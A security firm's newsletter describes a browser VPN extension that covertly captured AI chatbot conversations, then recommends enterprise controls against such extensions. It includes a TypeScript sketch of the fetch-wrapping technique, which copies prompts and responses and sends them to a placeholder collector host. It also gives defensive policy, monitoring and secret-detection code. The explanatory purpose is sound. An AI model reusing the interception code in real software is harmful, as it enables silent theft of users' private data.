April 11, 2026 Newsletter
A recent report highlighted a Chrome extension with a “Featured” badge and millions of installs that silently collected users’ AI chatbot conversations—both the prompts people typed and the answers they received.
InfoSight’s perspective: this is not “AI risk.” This is browser supply-chain risk—and it sits on the same path as credential theft, session hijacking, and data exfiltration. The difference is the data: AI chats often contain the most concentrated “good stuff” in an organization (internal context, drafts, code, customer details, operational issues, and decision-making).
What happened
The extension named in the reporting is Urban VPN Proxy, advertised as a privacy/VPN tool.
Researchers say an update released July 9, 2025 (version 5.5.0) enabled AI chat “harvesting” by default. Because extensions auto-update, users could have installed it for VPN features and later received new surveillance behavior without a clear, fresh decision.
The reported behavior targeted multiple AI platforms (including ChatGPT, Claude, Gemini, Copilot, Perplexity, and others).
The reporting also noted additional extensions from the same publisher with similar AI harvesting functionality.
A later update in the story said that by December 18, 2025, the extensions were no longer available for download from the Chrome Web Store, and by December 23, 2025, they were no longer available from Microsoft’s Edge add-ons marketplace.
How it worked (the simple version)
The researchers describe the extension injecting scripts into AI chatbot pages and then intercepting traffic by wrapping the browser's built-in network request functions (the same core mechanisms pages use to send and receive web traffic), so every message passed through the extension's code first.
In practice, that meant:
Every time you sent an AI prompt or received an AI response, the extension could see it.
The captured content (prompts, responses, timestamps, identifiers, metadata about platform/model) could be packaged and sent out to external servers.
The story specifically referenced data exfiltration to endpoints such as analytics.urban-vpn[.]com and stats.urban-vpn[.]com.
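The wrapping pattern the researchers describe is a well-known technique: an injected script replaces the page's standard networking function (such as `fetch`) with a version that forwards the real request but also keeps a copy. A minimal illustrative sketch follows; this is not the extension's actual code, and the URL filters and collection endpoint are placeholders:

```typescript
// Illustrative sketch of the fetch-wrapping technique described in the
// reporting. NOT the extension's actual code; the collection endpoint
// and the "/chat" URL filters below are placeholders.
const originalFetch = globalThis.fetch;

globalThis.fetch = async (
  input: RequestInfo | URL,
  init?: RequestInit,
): Promise<Response> => {
  const url =
    typeof input === "string" ? input :
    input instanceof URL ? input.toString() :
    input.url;

  // Pass the real request through so the chat page keeps working normally.
  const response = await originalFetch(input, init);

  // If the request looks like an AI chat API call, copy the traffic.
  if (url.includes("/conversation") || url.includes("/chat")) {
    const prompt = typeof init?.body === "string" ? init.body : null;
    const answer = await response.clone().text();
    // Package prompt, response, and metadata, and ship it out.
    void originalFetch("https://collector.example.invalid/ingest", {
      method: "POST",
      body: JSON.stringify({ url, prompt, answer, ts: Date.now() }),
    });
  }
  return response;
};
```

Because the wrapper returns the original response untouched, the user sees nothing unusual; the page behaves exactly as before.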
Why the “Featured” badge matters (and why it still isn’t a safety guarantee)
Google’s own Chrome Web Store help documentation states that Featured extensions “follow technical best practices” and meet a high standard, and that the Chrome Web Store team reviews each extension before awarding the badge.
That badge can act like an implicit endorsement, which is exactly why this is important operationally: trust signals drive installs—and installs create a high-privilege foothold inside the browser.
Also relevant: Chrome’s Web Store “Limited Use” policy prohibits selling or transferring user data to data brokers and restricts collection/use to a single disclosed purpose, with strict limits on third-party transfer.
Business impact: what data is actually at risk
AI chats inside organizations routinely contain:
Internal process details (how you operate, what’s broken, what you’re changing)
Draft customer communications and proposals
Code snippets, configs, logs, architecture diagrams
Vulnerability or incident notes pasted for “analysis”
Vendor details, invoices, pricing, contracts
Identity data (names, emails, phone numbers) typed casually
The risk is not theoretical. When prompts and responses are intercepted, the loss is direct disclosure of sensitive content, often with enough context to make it actionable for extortion, fraud, or targeted intrusion.
InfoSight take: the real root cause
This incident reinforces two hard truths:
“Free” privacy tools are frequently monetized through data. If the business model isn’t clear, assume your data is the product and you are the inventory.
Browser extensions are privileged software. They can read pages, alter traffic flows, and quietly expand scope over time via updates.
Treat extensions like endpoint agents, not like harmless add-ons.
What to do now (practical controls that reduce this risk)
1) Move from “allow by default” to “allowlist by policy”
Enforce extension allowlisting for corporate browsers.
Block installation of unapproved extensions and “developer mode” installs.
Remove “everyone can install anything” as a standard user privilege.
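For Chrome-managed fleets, allowlisting can be enforced centrally through enterprise policy. A minimal sketch of a managed-policy file (delivered via GPO on Windows or, e.g., `/etc/opt/chrome/policies/managed/` on Linux); the allowlisted extension ID below is a placeholder for one your security team has approved:

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "abcdefghijklmnopabcdefghijklmnop"
  ]
}
```

Blocking `*` and then allowlisting specific IDs inverts the default: nothing installs unless it has been explicitly approved.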
2) Inventory and continuously monitor extensions
Maintain an up-to-date list of installed extensions by user/device.
Alert on:
newly installed extensions
permission changes
publisher changes
sudden version jumps across the fleet (auto-update wave)
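The alerting logic above amounts to diffing inventory snapshots. A sketch, assuming inventory records from your browser-management or EDR tooling (the field names here are illustrative, not a real API):

```typescript
// Illustrative sketch: diff two extension-inventory snapshots and flag
// the events worth alerting on. Field names are assumptions.
interface ExtensionRecord {
  id: string;
  publisher: string;
  version: string;
  permissions: string[];
}

function diffInventory(
  previous: Map<string, ExtensionRecord>,
  current: Map<string, ExtensionRecord>,
): string[] {
  const alerts: string[] = [];
  for (const [id, ext] of current) {
    const old = previous.get(id);
    if (!old) {
      alerts.push(`new extension installed: ${id}`);
      continue;
    }
    if (old.publisher !== ext.publisher) {
      alerts.push(`publisher changed for ${id}`);
    }
    if (old.version !== ext.version) {
      alerts.push(`version changed for ${id}: ${old.version} -> ${ext.version}`);
    }
    const added = ext.permissions.filter((p) => !old.permissions.includes(p));
    if (added.length > 0) {
      alerts.push(`new permissions for ${id}: ${added.join(", ")}`);
    }
  }
  return alerts;
}
```

Aggregating the version-change alerts across devices is what surfaces the fleet-wide auto-update wave, which is exactly how the July 2025 behavior change would have shown up.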
3) Restrict AI usage to controlled paths
Use enterprise AI offerings / managed access methods where possible.
Segment who can use public AI chat in the browser and from which devices.
For higher-risk teams (finance, HR, engineering, executives), consider browser isolation or a dedicated “clean” browser profile with no extensions.
4) Block known-bad telemetry and suspicious egress
Use DNS / secure web gateway controls to block exfil domains when identified.
Monitor for unusual outbound connections from browser contexts.
Correlate new domains with extension installs.
5) Apply DLP and “don’t paste secrets” guardrails
Implement DLP rules for copying sensitive data into web forms where feasible.
Train explicitly on AI: “If it would be classified in email, it’s classified in a prompt.”
Treat AI prompts as a data-handling surface, not a casual scratchpad.
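A minimal client-side guardrail along these lines can pre-screen prompt text for obvious secrets before submission. The patterns below are illustrative examples only; a production DLP engine covers far more cases than a handful of regexes:

```typescript
// Illustrative pre-submit check for obvious secrets in AI prompt text.
// Patterns are examples only, not a complete DLP ruleset.
const secretPatterns: [string, RegExp][] = [
  ["email address", /[\w.+-]+@[\w-]+\.[\w.]+/],
  ["AWS access key ID", /\bAKIA[0-9A-Z]{16}\b/],
  ["private key header", /-----BEGIN [A-Z ]*PRIVATE KEY-----/],
];

function findSensitive(prompt: string): string[] {
  return secretPatterns
    .filter(([, re]) => re.test(prompt))
    .map(([label]) => label);
}
```

A non-empty result can trigger a warning prompt or a block, depending on policy; even a warn-only mode reinforces the "prompts are a data-handling surface" message.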
6) Put AI + browser extensions into your risk register
Document acceptable use for AI tools.
Document acceptable extension categories and approval process.
Require vendor transparency on data handling, retention, and third-party sharing.
Bottom line
This story is a reminder that the browser is now a primary data plane for the business—especially as AI becomes part of daily work. The operational fix is straightforward: govern extensions like software, govern AI prompts like data, and assume trust badges are not security controls.
Subscribe to our newsletter to stay updated on the latest cybersecurity insights and resources.